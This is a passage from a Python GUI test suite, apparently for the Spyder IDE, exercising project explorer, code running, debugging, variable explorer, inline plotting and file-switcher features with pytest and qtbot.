project_dir = to_text_string(tmpdir.mkdir('test'))
# Create an empty notebook in the project dir
nb = osp.join(LOCATION, 'notebook.ipynb')
shutil.copy(nb, osp.join(project_dir, 'notebook.ipynb'))
# Create project
with qtbot.waitSignal(projects.sig_project_loaded):
projects._create_project(project_dir)
# Select notebook in the project explorer
idx = projects.get_widget().treewidget.get_index(
osp.join(project_dir, 'notebook.ipynb'))
projects.get_widget().treewidget.setCurrentIndex(idx)
# Prese Enter there
qtbot.keyClick(projects.get_widget().treewidget, Qt.Key_Enter)
# Assert that notebook was open
assert 'notebook.ipynb' in editorstack.get_current_filename()
# Convert notebook to a Python file
projects.get_widget().treewidget.convert_notebook(
osp.join(project_dir, 'notebook.ipynb'))
# Assert notebook was open
assert 'untitled' in editorstack.get_current_filename()
# Assert its contents are the expected ones
file_text = editorstack.get_current_editor().toPlainText()
if nbconvert.__version__ >= '5.4.0':
expected_text = ('#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:'
'\n\n\n1 + 1\n\n\n# In[ ]:\n\n\n\n\n')
else:
expected_text = '\n# coding: utf-8\n\n# In[1]:\n\n\n1 + 1\n\n\n'
assert file_text == expected_text
# Close project
projects.close_project()
@pytest.mark.slow
@flaky(max_runs=3)
def test_runfile_from_project_explorer(main_window, qtbot, tmpdir):
"""Test that file are run from the Project explorer."""
projects = main_window.projects
projects.toggle_view_action.setChecked(True)
editorstack = main_window.editor.get_current_editorstack()
# Create a temp project directory
project_dir = to_text_string(tmpdir.mkdir('test'))
# Create an empty file in the project dir
test_file = osp.join(LOCATION, 'script.py')
shutil.copy(test_file, osp.join(project_dir, 'script.py'))
# Create project
with qtbot.waitSignal(projects.sig_project_loaded):
projects._create_project(project_dir)
# Select file in the project explorer
idx = projects.get_widget().treewidget.get_index(
osp.join(project_dir, 'script.py'))
projects.get_widget().treewidget.setCurrentIndex(idx)
# Press Enter there
qtbot.keyClick(projects.get_widget().treewidget, Qt.Key_Enter)
# Assert that the file was open
assert 'script.py' in editorstack.get_current_filename()
# Run Python file
projects.get_widget().treewidget.run([osp.join(project_dir, 'script.py')])
# Wait until the new console is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Wait until all objects have appeared in the variable explorer
nsb = main_window.variableexplorer.current_widget()
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 4,
timeout=EVAL_TIMEOUT)
# Check variables value
assert shell.get_value('a') == 10
assert shell.get_value('s') == "Z:\\escape\\test\\string\n"
assert shell.get_value('li') == [1, 2, 3]
assert_array_equal(shell.get_value('arr'), np.array([1, 2, 3]))
# Close project
projects.close_project()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason="It times out sometimes on Windows")
def test_set_new_breakpoints(main_window, qtbot):
"""Test that new breakpoints are set in the IPython console."""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
control = shell._control
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# Load test file
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
# Click the debug button
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(debug_button, Qt.LeftButton)
# Set a breakpoint
code_editor = main_window.editor.get_focus_widget()
code_editor.debugger.toogle_breakpoint(line_number=6)
# Verify that the breakpoint was set
with qtbot.waitSignal(shell.executed):
shell.pdb_execute("!b")
assert "1 breakpoint keep yes at {}:6".format(test_file) in control.toPlainText()
# Remove breakpoint and close test file
main_window.editor.clear_all_breakpoints()
main_window.editor.close_file()
@pytest.mark.slow
@flaky(max_runs=3)
def test_run_code(main_window, qtbot, tmpdir):
"""Test all the different ways we have to run code"""
# ---- Setup ----
p = (tmpdir.mkdir(u"runtest's folder èáïü Øαôå 字分误")
.join(u"runtest's file èáïü Øαôå 字分误.py"))
filepath = to_text_string(p)
shutil.copyfile(osp.join(LOCATION, 'script.py'), filepath)
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Load test file
main_window.editor.load(filepath)
# Move to the editor's first line
code_editor = main_window.editor.get_focus_widget()
code_editor.setFocus()
qtbot.keyClick(code_editor, Qt.Key_Home, modifier=Qt.ControlModifier)
# Get a reference to the namespace browser widget
nsb = main_window.variableexplorer.current_widget()
# ---- Run file ----
qtbot.keyClick(code_editor, Qt.Key_F5)
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 4,
timeout=EVAL_TIMEOUT)
# Verify result
assert shell.get_value('a') == 10
assert shell.get_value('s') == "Z:\\escape\\test\\string\n"
assert shell.get_value('li') == [1, 2, 3]
assert_array_equal(shell.get_value('arr'), np.array([1, 2, 3]))
reset_run_code(qtbot, shell, code_editor, nsb)
# ---- Run lines ----
# Run the whole file line by line
for _ in range(code_editor.blockCount()):
qtbot.keyClick(code_editor, Qt.Key_F9)
qtbot.wait(200)
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 4,
timeout=EVAL_TIMEOUT)
# Verify result
assert shell.get_value('a') == 10
assert shell.get_value('s') == "Z:\\escape\\test\\string\n"
assert shell.get_value('li') == [1, 2, 3]
assert_array_equal(shell.get_value('arr'), np.array([1, 2, 3]))
reset_run_code(qtbot, shell, code_editor, nsb)
# ---- Run cell and advance ----
# Run the five cells present in file
# Add an unnamed cell at the top of the file
qtbot.keyClicks(code_editor, 'a = 10')
qtbot.keyClick(code_editor, Qt.Key_Return)
qtbot.keyClick(code_editor, Qt.Key_Up)
for _ in range(5):
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
qtbot.wait(500)
# Check for errors and the runcell function
assert 'runcell' in shell._control.toPlainText()
assert 'Error:' not in shell._control.toPlainText()
control_text = shell._control.toPlainText()
# Rerun
shell.setFocus()
qtbot.keyClick(shell._control, Qt.Key_Up)
qtbot.wait(500)
qtbot.keyClick(shell._control, Qt.Key_Enter, modifier=Qt.ShiftModifier)
qtbot.wait(500)
code_editor.setFocus()
assert control_text != shell._control.toPlainText()
control_text = shell._control.toPlainText()[len(control_text):]
# Check for errors and the runcell function
assert 'runcell' in control_text
assert 'Error' not in control_text
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 4,
timeout=EVAL_TIMEOUT)
# Verify result
assert ']: 10\n' in shell._control.toPlainText()
assert shell.get_value('a') == 10
assert shell.get_value('s') == "Z:\\escape\\test\\string\n"
assert shell.get_value('li') == [1, 2, 3]
assert_array_equal(shell.get_value('arr'), np.array([1, 2, 3]))
reset_run_code(qtbot, shell, code_editor, nsb)
# ---- Run cell ----
# Run the first cell in file
modifier = Qt.ControlModifier
if sys.platform == 'darwin':
modifier = Qt.MetaModifier
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=modifier)
# Wait until the object has appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 1,
timeout=EVAL_TIMEOUT)
# Verify result
assert shell.get_value('a') == 10
# Press Ctrl+Enter a second time to verify that we're *not* advancing
# to the next cell
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=modifier)
assert nsb.editor.source_model.rowCount() == 1
reset_run_code(qtbot, shell, code_editor, nsb)
# ---- Debug cell ------
with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_Return,
modifier=Qt.AltModifier | Qt.ShiftModifier)
qtbot.keyClicks(shell._control, '!c')
qtbot.keyClick(shell._control, Qt.Key_Enter)
# Wait until the object has appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 1,
timeout=EVAL_TIMEOUT)
reset_run_code(qtbot, shell, code_editor, nsb)
# ---- Re-run last cell ----
# Run the first three cells in file
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
qtbot.wait(500)
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
qtbot.wait(500)
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
# Wait until objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 2,
timeout=EVAL_TIMEOUT)
# Clean namespace
with qtbot.waitSignal(shell.executed):
shell.execute('%reset -f')
# Wait until there are no objects in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 0,
timeout=EVAL_TIMEOUT)
# Re-run last cell
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.AltModifier)
# Wait until the object has appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 1,
timeout=EVAL_TIMEOUT)
assert shell.get_value('li') == [1, 2, 3]
# ---- Closing test file ----
main_window.editor.close_file()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform == 'darwin', reason="It fails on macOS")
@pytest.mark.parametrize('main_window',
[{'spy_config': ('editor', 'run_cell_copy', True)}],
indirect=True)
def test_run_cell_copy(main_window, qtbot, tmpdir):
"""Test all the different ways we have to run code"""
# ---- Setup ----
p = (tmpdir.mkdir(u"runtest's folder èáïü Øαôå 字分误")
.join(u"runtest's file èáïü Øαôå 字分误.py"))
filepath = to_text_string(p)
shutil.copyfile(osp.join(LOCATION, 'script.py'), filepath)
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Make sure run_cell_copy is properly set
for editorstack in main_window.editor.editorstacks:
editorstack.set_run_cell_copy(True)
# Load test file
main_window.editor.load(filepath)
# Move to the editor's first line
code_editor = main_window.editor.get_focus_widget()
code_editor.setFocus()
qtbot.keyClick(code_editor, Qt.Key_Home, modifier=Qt.ControlModifier)
# Get a reference to the namespace browser widget
nsb = main_window.variableexplorer.current_widget()
# ---- Run cell and advance ----
# Run the three cells present in file
for _ in range(4):
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
qtbot.wait(500)
# Check for errors and the copied code
assert 'runcell' not in shell._control.toPlainText()
assert 'a = 10' in shell._control.toPlainText()
assert 'Error:' not in shell._control.toPlainText()
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 4,
timeout=EVAL_TIMEOUT)
# Verify result
assert ']: 10\n' in shell._control.toPlainText()
assert shell.get_value('a') == 10
assert shell.get_value('s') == "Z:\\escape\\test\\string\n"
assert shell.get_value('li') == [1, 2, 3]
assert_array_equal(shell.get_value('arr'), np.array([1, 2, 3]))
# ---- Closing test file and reset config ----
main_window.editor.close_file()
CONF.set('editor', 'run_cell_copy', False)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(running_in_ci(), reason="Fails on CIs")
def test_open_files_in_new_editor_window(main_window, qtbot):
"""
This tests that opening files in a new editor window
is working as expected.
Test for spyder-ide/spyder#4085.
"""
# Set a timer to manipulate the open dialog while it's running
QTimer.singleShot(2000, lambda: open_file_in_editor(main_window,
'script.py',
directory=LOCATION))
# Create a new editor window
# Note: editor.load() uses the current editorstack by default
main_window.editor.create_new_window()
main_window.editor.load()
# Perform the test
# Note: There's always one file open in the Editor
editorstack = main_window.editor.get_current_editorstack()
assert editorstack.get_stack_count() == 2
@pytest.mark.slow
@flaky(max_runs=3)
def test_close_when_file_is_changed(main_window, qtbot):
"""Test closing spyder when there is a file with modifications open."""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Load test file
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
editorstack = main_window.editor.get_current_editorstack()
editor = editorstack.get_current_editor()
editor.document().setModified(True)
# Wait for the segfault
qtbot.wait(3000)
@pytest.mark.slow
@flaky(max_runs=3)
def test_maximize_minimize_plugins(main_window, qtbot):
"""Test that the maximize button is working correctly."""
# Set focus to the Editor
main_window.editor.get_focus_widget().setFocus()
# Click the maximize button
max_action = main_window.layouts.maximize_action
max_button = main_window.main_toolbar.widgetForAction(max_action)
qtbot.mouseClick(max_button, Qt.LeftButton)
# Verify that the Editor is maximized
assert main_window.editor._ismaximized
# Verify that the action minimizes the plugin too
qtbot.mouseClick(max_button, Qt.LeftButton)
assert not main_window.editor._ismaximized
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt' or running_in_ci() and PYQT_VERSION >= '5.9',
reason="It times out on Windows and segfaults in our CIs with PyQt >= 5.9")
def test_issue_4066(main_window, qtbot):
"""
Test for a segfault when these steps are followed:
1. Open an object present in the Variable Explorer (e.g. a list).
2. Delete that object in its corresponding console while its
editor is still open.
3. Closing that editor by pressing its *Ok* button.
"""
# Create the object
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
with qtbot.waitSignal(shell.executed):
shell.execute('myobj = [1, 2, 3]')
# Open editor associated with that object and get a reference to it
nsb = main_window.variableexplorer.current_widget()
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() > 0, timeout=EVAL_TIMEOUT)
nsb.editor.setFocus()
nsb.editor.edit_item()
obj_editor_id = list(nsb.editor.delegate._editors.keys())[0]
obj_editor = nsb.editor.delegate._editors[obj_editor_id]['editor']
# Move to the IPython console and delete that object
main_window.ipyconsole.get_widget().get_focus_widget().setFocus()
with qtbot.waitSignal(shell.executed):
shell.execute('del myobj')
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 0, timeout=EVAL_TIMEOUT)
# Close editor
ok_widget = obj_editor.btn_close
qtbot.mouseClick(ok_widget, Qt.LeftButton)
# Wait for the segfault
qtbot.wait(3000)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason="It times out sometimes on Windows")
def test_varexp_edit_inline(main_window, qtbot):
"""
Test for errors when editing inline values in the Variable Explorer
and then moving to another plugin.
Note: Errors for this test don't appear related to it but instead they
are shown down the road. That's because they are generated by an
async C++ RuntimeError.
"""
# Create object
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
with qtbot.waitSignal(shell.executed):
shell.execute('a = 10')
# Edit object
main_window.variableexplorer.change_visibility(True)
nsb = main_window.variableexplorer.current_widget()
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() > 0, timeout=EVAL_TIMEOUT)
nsb.editor.setFocus()
nsb.editor.edit_item()
# Change focus to IPython console
main_window.ipyconsole.get_widget().get_focus_widget().setFocus()
# Wait for the error
qtbot.wait(3000)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(not sys.platform.startswith('linux'),
reason="It times out sometimes on Windows and macOS")
def test_c_and_n_pdb_commands(main_window, qtbot):
"""Test that c and n Pdb commands update the Variable Explorer."""
nsb = main_window.variableexplorer.current_widget()
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
control = shell._control
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# Load test file
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
# Click the debug button
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(debug_button, Qt.LeftButton)
# Set a breakpoint
code_editor = main_window.editor.get_focus_widget()
code_editor.debugger.toogle_breakpoint(line_number=6)
qtbot.wait(500)
# Verify that c works
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!c')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.waitUntil(
lambda: nsb.editor.source_model.rowCount() == 1)
# Verify that n works
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!n')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.waitUntil(
lambda: nsb.editor.source_model.rowCount() == 2)
# Verify that doesn't go to sitecustomize.py with next and stops
# the debugging session.
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!n')
qtbot.keyClick(control, Qt.Key_Enter)
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!n')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.waitUntil(
lambda: nsb.editor.source_model.rowCount() == 3)
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!n')
qtbot.keyClick(control, Qt.Key_Enter)
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!n')
qtbot.keyClick(control, Qt.Key_Enter)
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!n')
qtbot.keyClick(control, Qt.Key_Enter)
# Assert that the prompt appear
shell.clear_console()
assert 'In [2]:' in control.toPlainText()
# Remove breakpoint and close test file
main_window.editor.clear_all_breakpoints()
main_window.editor.close_file()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason="It times out sometimes on Windows")
def test_stop_dbg(main_window, qtbot):
"""Test that we correctly stop a debugging session."""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# Load test file
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
# Click the debug button
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(debug_button, Qt.LeftButton)
# Move to the next line
with qtbot.waitSignal(shell.executed):
shell.pdb_execute("!n")
# Stop debugging
stop_debug_action = main_window.debug_toolbar_actions[5]
stop_debug_button = main_window.debug_toolbar.widgetForAction(stop_debug_action)
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(stop_debug_button, Qt.LeftButton)
# Assert there are only two ipdb prompts in the console
assert shell._control.toPlainText().count('IPdb') == 2
# Remove breakpoint and close test file
main_window.editor.clear_all_breakpoints()
main_window.editor.close_file()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(not sys.platform.startswith('linux'),
reason="It only works on Linux")
def test_change_cwd_dbg(main_window, qtbot):
"""
Test that using the Working directory toolbar is working while debugging.
"""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Load test file to be able to enter in debugging mode
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
# Give focus to the widget that's going to receive clicks
control = main_window.ipyconsole.get_widget().get_focus_widget()
control.setFocus()
# Click the debug button
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
qtbot.mouseClick(debug_button, Qt.LeftButton)
qtbot.wait(1000)
# Set LOCATION as cwd
main_window.workingdirectory.chdir(tempfile.gettempdir())
qtbot.wait(1000)
print(repr(control.toPlainText()))
shell.clear_console()
qtbot.wait(500)
# Get cwd in console
qtbot.keyClicks(control, 'import os; os.getcwd()')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.wait(1000)
# Assert cwd is the right one
assert tempfile.gettempdir() in control.toPlainText()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason="Times out sometimes")
def test_varexp_magic_dbg(main_window, qtbot):
"""Test that %varexp is working while debugging."""
nsb = main_window.variableexplorer.current_widget()
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Load test file to be able to enter in debugging mode
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
# Give focus to the widget that's going to receive clicks
control = main_window.ipyconsole.get_widget().get_focus_widget()
control.setFocus()
# Click the debug button
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(debug_button, Qt.LeftButton)
# Get to an object that can be plotted
for _ in range(3):
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!n')
qtbot.keyClick(control, Qt.Key_Enter)
# Generate the plot from the Variable Explorer
nsb.editor.plot('li', 'plot')
qtbot.wait(1000)
# Assert that there's a plot in the console
assert shell._control.toHtml().count('img src') == 1
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(PY2, reason="It times out sometimes")
@pytest.mark.parametrize(
'main_window',
[{'spy_config': ('ipython_console', 'pylab/inline/figure_format', 1)},
{'spy_config': ('ipython_console', 'pylab/inline/figure_format', 0)}],
indirect=True)
def test_plots_plugin(main_window, qtbot, tmpdir, mocker):
"""
Test that plots generated in the IPython console are properly displayed
in the plots plugin.
"""
assert CONF.get('plots', 'mute_inline_plotting') is False
shell = main_window.ipyconsole.get_current_shellwidget()
figbrowser = main_window.plots.current_widget()
# Wait until the window is fully up.
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Generate a plot inline.
with qtbot.waitSignal(shell.executed):
shell.execute(("import matplotlib.pyplot as plt\n"
"fig = plt.plot([1, 2, 3, 4], '.')\n"))
if CONF.get('ipython_console', 'pylab/inline/figure_format') == 0:
assert figbrowser.figviewer.figcanvas.fmt == 'image/png'
else:
assert figbrowser.figviewer.figcanvas.fmt == 'image/svg+xml'
# Get the image name from the html, fetch the image from the shell, and
# save it as a png.
html = shell._control.toHtml()
img_name = re.search('''<img src="(.+?)" /></p>''', html).group(1)
ipython_figname = osp.join(to_text_string(tmpdir), 'ipython_img.png')
ipython_qimg = shell._get_image(img_name)
ipython_qimg.save(ipython_figname)
# Save the image with the Plots plugin as a png.
plots_figname = osp.join(to_text_string(tmpdir), 'plots_img.png')
mocker.patch('spyder.plugins.plots.widgets.figurebrowser.getsavefilename',
return_value=(plots_figname, '.png'))
figbrowser.save_figure()
assert compare_images(ipython_figname, plots_figname, 0.1) is None
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(
(parse_version(ipy_release.version) >= parse_version('7.23.0') and
parse_version(ipykernel.__version__) <= parse_version('5.5.3')),
reason="Fails due to a bug in the %matplotlib magic")
def test_tight_layout_option_for_inline_plot(main_window, qtbot, tmpdir):
"""
Test that the option to set bbox_inches to 'tight' or 'None' is
working when plotting inline in the IPython console. By default, figures
are plotted inline with bbox_inches='tight'.
"""
tmpdir = to_text_string(tmpdir)
# Assert that the default is True.
assert CONF.get('ipython_console', 'pylab/inline/bbox_inches') is True
fig_dpi = float(CONF.get('ipython_console', 'pylab/inline/resolution'))
fig_width = float(CONF.get('ipython_console', 'pylab/inline/width'))
fig_height = float(CONF.get('ipython_console', 'pylab/inline/height'))
# Wait until the window is fully up.
shell = main_window.ipyconsole.get_current_shellwidget()
client = main_window.ipyconsole.get_current_client()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Give focus to the widget that's going to receive clicks
control = main_window.ipyconsole.get_widget().get_focus_widget()
control.setFocus()
# Generate a plot inline with bbox_inches=tight (since it is default) and
# save the figure with savefig.
savefig_figname = osp.join(
tmpdir, 'savefig_bbox_inches_tight.png').replace('\\', '/')
with qtbot.waitSignal(shell.executed):
shell.execute(("import matplotlib.pyplot as plt\n"
"fig, ax = plt.subplots()\n"
"fig.set_size_inches(%f, %f)\n"
"ax.set_position([0.25, 0.25, 0.5, 0.5])\n"
"ax.set_xticks(range(10))\n"
"ax.xaxis.set_ticklabels([])\n"
"ax.set_yticks(range(10))\n"
"ax.yaxis.set_ticklabels([])\n"
"ax.tick_params(axis='both', length=0)\n"
"for loc in ax.spines:\n"
" ax.spines[loc].set_color('#000000')\n"
" ax.spines[loc].set_linewidth(2)\n"
"ax.axis([0, 9, 0, 9])\n"
"ax.plot(range(10), color='#000000', lw=2)\n"
"fig.savefig('%s',\n"
" bbox_inches='tight',\n"
" dpi=%f)"
) % (fig_width, fig_height, savefig_figname, fig_dpi))
# Get the image name from the html, fetch the image from the shell, and
# then save it to a file.
html = shell._control.toHtml()
img_name = re.search('''<img src="(.+?)" /></p>''', html).group(1)
qimg = shell._get_image(img_name)
assert isinstance(qimg, QImage)
# Save the inline figure and assert it is similar to the one generated
# with savefig.
inline_figname = osp.join(tmpdir, 'inline_bbox_inches_tight.png')
qimg.save(inline_figname)
assert compare_images(savefig_figname, inline_figname, 0.1) is None
# Change the option so that bbox_inches=None.
CONF.set('ipython_console', 'pylab/inline/bbox_inches', False)
# Restart the kernel and wait until it's up again
shell._prompt_html = None
client.restart_kernel()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Generate the same plot inline with bbox_inches='tight' and save the
# figure with savefig.
savefig_figname = osp.join(
tmpdir, 'savefig_bbox_inches_None.png').replace('\\', '/')
with qtbot.waitSignal(shell.executed):
shell.execute(("import matplotlib.pyplot as plt\n"
"fig, ax = plt.subplots()\n"
"fig.set_size_inches(%f, %f)\n"
"ax.set_position([0.25, 0.25, 0.5, 0.5])\n"
"ax.set_xticks(range(10))\n"
"ax.xaxis.set_ticklabels([])\n"
"ax.set_yticks(range(10))\n"
"ax.yaxis.set_ticklabels([])\n"
"ax.tick_params(axis='both', length=0)\n"
"for loc in ax.spines:\n"
" ax.spines[loc].set_color('#000000')\n"
" ax.spines[loc].set_linewidth(2)\n"
"ax.axis([0, 9, 0, 9])\n"
"ax.plot(range(10), color='#000000', lw=2)\n"
"fig.savefig('%s',\n"
" bbox_inches=None,\n"
" dpi=%f)"
) % (fig_width, fig_height, savefig_figname, fig_dpi))
# Get the image name from the html, fetch the image from the shell, and
# then save it to a file.
html = shell._control.toHtml()
img_name = re.search('''<img src="(.+?)" /></p>''', html).group(1)
qimg = shell._get_image(img_name)
assert isinstance(qimg, QImage)
# Save the inline figure and assert it is similar to the one generated
# with savefig.
inline_figname = osp.join(tmpdir, 'inline_bbox_inches_None.png')
qimg.save(inline_figname)
assert compare_images(savefig_figname, inline_figname, 0.1) is None
# FIXME: Make this test work again in our CIs (it's passing locally)
@pytest.mark.skip
@flaky(max_runs=3)
@pytest.mark.slow
@pytest.mark.use_introspection
def test_switcher(main_window, qtbot, tmpdir):
"""Test the use of shorten paths when necessary in the switcher."""
switcher = main_window.switcher
# Assert that the full path of a file is shown in the switcher
file_a = tmpdir.join('test_file_a.py')
file_a.write('''
def example_def():
pass
def example_def_2():
pass
''')
main_window.editor.load(str(file_a))
main_window.open_switcher()
switcher_paths = [switcher.model.item(item_idx).get_description()
for item_idx in range(switcher.model.rowCount())]
assert osp.dirname(str(file_a)) in switcher_paths or len(str(file_a)) > 75
switcher.close()
# Assert that long paths are shortened in the switcher
dir_b = tmpdir
for _ in range(3):
dir_b = dir_b.mkdir(str(uuid.uuid4()))
file_b = dir_b.join('test_file_b.py')
file_b.write('bar\n')
main_window.editor.load(str(file_b))
main_window.open_switcher()
file_b_text = switcher.model.item(
switcher.model.rowCount() - 1).get_description()
assert '...' in file_b_text
switcher.close()
# Assert search works correctly
search_texts = ['test_file_a', 'file_b', 'foo_spam']
expected_paths = [file_a, file_b, None]
for search_text, expected_path in zip(search_texts, expected_paths):
main_window.open_switcher()
qtbot.keyClicks(switcher.edit, search_text)
qtbot.wait(200)
assert switcher.count() == bool(expected_path)
switcher.close()
# Assert symbol switcher works
main_window.editor.set_current_filename(str(file_a))
code_editor = main_window.editor.get_focus_widget()
with qtbot.waitSignal(
code_editor.completions_response_signal, timeout=30000):
code_editor.document_did_open()
with qtbot.waitSignal(
code_editor.completions_response_signal, timeout=30000):
code_editor.request_symbols()
qtbot.wait(9000)
main_window.open_switcher()
qtbot.keyClicks(switcher.edit, '@')
qtbot.wait(200)
assert switcher.count() == 2
switcher.close()
@flaky(max_runs=3)
@pytest.mark.slow
def test_edidorstack_open_switcher_dlg(main_window, tmpdir):
"""
Test that the file switcher is working as expected when called from the
editorstack.
Regression test for spyder-ide/spyder#10684
"""
# Add a file to the editor.
file = tmpdir.join('test_file_open_switcher_dlg.py')
file.write("a test file for test_edidorstack_open_switcher_dlg")
main_window.editor.load(str(file))
# Test that the file switcher opens as expected from the editorstack.
editorstack = main_window.editor.get_current_editorstack()
assert editorstack.switcher_dlg is None
editorstack.open_switcher_dlg()
assert editorstack.switcher_dlg
assert editorstack.switcher_dlg.isVisible()
assert (editorstack.switcher_dlg.count() ==
len(main_window.editor.get_filenames()))
@flaky(max_runs=3)
@pytest.mark.slow
@pytest.mark.use_introspection
@pytest.mark.skipif(not sys.platform.startswith('linux'),
reason="It times out too much on Windows and macOS")
def test_editorstack_open_symbolfinder_dlg(main_window, qtbot, tmpdir):
"""
Test that the symbol finder is working as expected when called from the
editorstack.
Regression test for spyder-ide/spyder#10684
"""
# Add a file to the editor.
file = tmpdir.join('test_file.py')
file.write('''
def example_def():
pass
def example_def_2():
pass
''')
main_window.editor.load(str(file))
code_editor = main_window.editor.get_focus_widget()
with qtbot.waitSignal(
code_editor.completions_response_signal, timeout=30000):
code_editor.document_did_open()
with qtbot.waitSignal(
code_editor.completions_response_signal, timeout=30000):
code_editor.request_symbols()
qtbot.wait(5000)
